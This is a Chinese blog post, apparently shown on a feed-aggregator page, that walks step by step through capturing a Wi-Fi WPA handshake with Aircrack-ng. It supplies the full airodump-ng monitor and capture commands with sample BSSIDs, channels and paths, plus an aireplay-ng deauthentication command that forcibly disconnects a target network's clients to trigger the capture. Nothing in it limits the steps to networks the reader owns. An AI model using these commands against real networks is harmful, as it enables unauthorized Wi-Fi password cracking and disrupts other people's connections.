惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
大猫的无限游戏
大猫的无限游戏
酷 壳 – CoolShell
酷 壳 – CoolShell
博客园 - 叶小钗
月光博客
月光博客
Last Week in AI
Last Week in AI
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
人人都是产品经理
人人都是产品经理
阮一峰的网络日志
阮一峰的网络日志
罗磊的独立博客
IT之家
IT之家
美团技术团队
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Hugging Face - Blog
Hugging Face - Blog
博客园_首页
S
SegmentFault 最新的问题
宝玉的分享
宝玉的分享
博客园 - Franky
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Jina AI
Jina AI
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
The Cloudflare Blog
博客园 - 司徒正美
爱范儿
爱范儿

博客园 - airoot

用得顺手的软件记录 关闭win11开始菜单中的“全部” Chrome浏览器升级到138后不支持MV2插件 BGP 在线工具全景:从路由监控到策略验证 Chrome历史版本下载 Hyper Server 2019安装I226-V网卡驱动 FortiGate连接中国联通SDWAN Pve安装Win10 解决zabbix7.0图形中文乱码 openwrt squashfs镜像扩容 Redmi AX3000免拆开启SSH刷入OpenWrt vRealize Operations Manager 报告和大屏配置 使用 Cloudflare Tunnel 作为反向代理访问内网服务 PVE8.3.1创建LXC部署Docker PVE的local和local-lvm PVE8.3.1安装注意事项 Openwrt作为旁路由的必要设置 PVE8.3.1 直通硬盘 PVE8.3.1开启核显虚拟化SR-IOV PVE8.3.1 LXC下安装 OpenWRT 记录 PVE 8.3.1安装后的优化 ESXi 直通 7840HS 核显 Esxi intel iGPU SR-IOV
Aircrack-ng抓握手包
airoot · 2026-07-11 · via 博客园 - airoot

执行命令前最好用sudo -i 切换到root权限

#1,最好使用外置无线网卡,如果使用虚拟机的,把无线网卡直通到虚拟机

#2,查看网卡是否识别,通常第一块无线网卡名称为:wlan0,以下操作以wlan0举例

#3,执行扫描前清除一次进程

#4,开启网卡监听,通常情况下,成功开启监听后"ifconfig"命令可以查看到"wlan0"会变成"wlan0mon"

#5,开始扫描WIFI

该命令默认扫描的是2.4G频段,如果需要扫描全部频段,可以使用以下命令

airodump-ng wlan0mon -b abg

如果只需要扫描5G频段,可以使用以下命令

airodump-ng wlan0mon -b a

另外,也可以使用以下命令查看无线网卡是否支持5G

图片

这里分上下两部分内容,第一部分是扫描到的SSID(AP)列表,在ESSID列可以看到Wifi名称

第二部分是WIFI下面连接的客户端,也就是STATION,所以最佳的条件是你的目标AP下已经有已连接的客户端,便于后面抓握手包。

满足以上条件后,可以按Ctrl+C终止了,并记录以下数据:
• 目标 BSSID(AP的物理MAC)
• CH(信道)

#6,抓包

命令格式

airodump-ng --bssid <目标BSSID> -c <信道> -w <文件保存路径> <无线网卡名称>

 本案例为

airodump-ng --bssid E6:B4:2F:4E:09:82 -c 6 -w /home/kali/Desktop/crackwifi wlan0mon

 执行这个命令后,保持终端窗口不要关闭,当用户掉线以后再次连接,就会抓到握手包。出现下图Handshake即可按Ctrl+C停止。

图片

抓到的握手包的路径是刚才定义的 /home/kali/Desktop 目录下的 .cap 文件

#7 补充

通常情况下需要等到对方客户端重连才能获取握手包,我们不可能一直等着,所以可以采取主动Attack强制客户端下线诱发重连,这里注意需要另开一个终端执行命令,命令格式为

aireplay-ng -0 <Attack次数> -a <目标BSSID> -c <已连接的客户端MAC地址> <网卡名称>

本案例为

aireplay-ng -0 10 -a A4:1A:3A:05:AB:C3 -c 7E:82:9E:BE:09:A5 wlan0mon

 通常情况下,执行完这个命令后,就能有效帮助步骤6抓到握手包。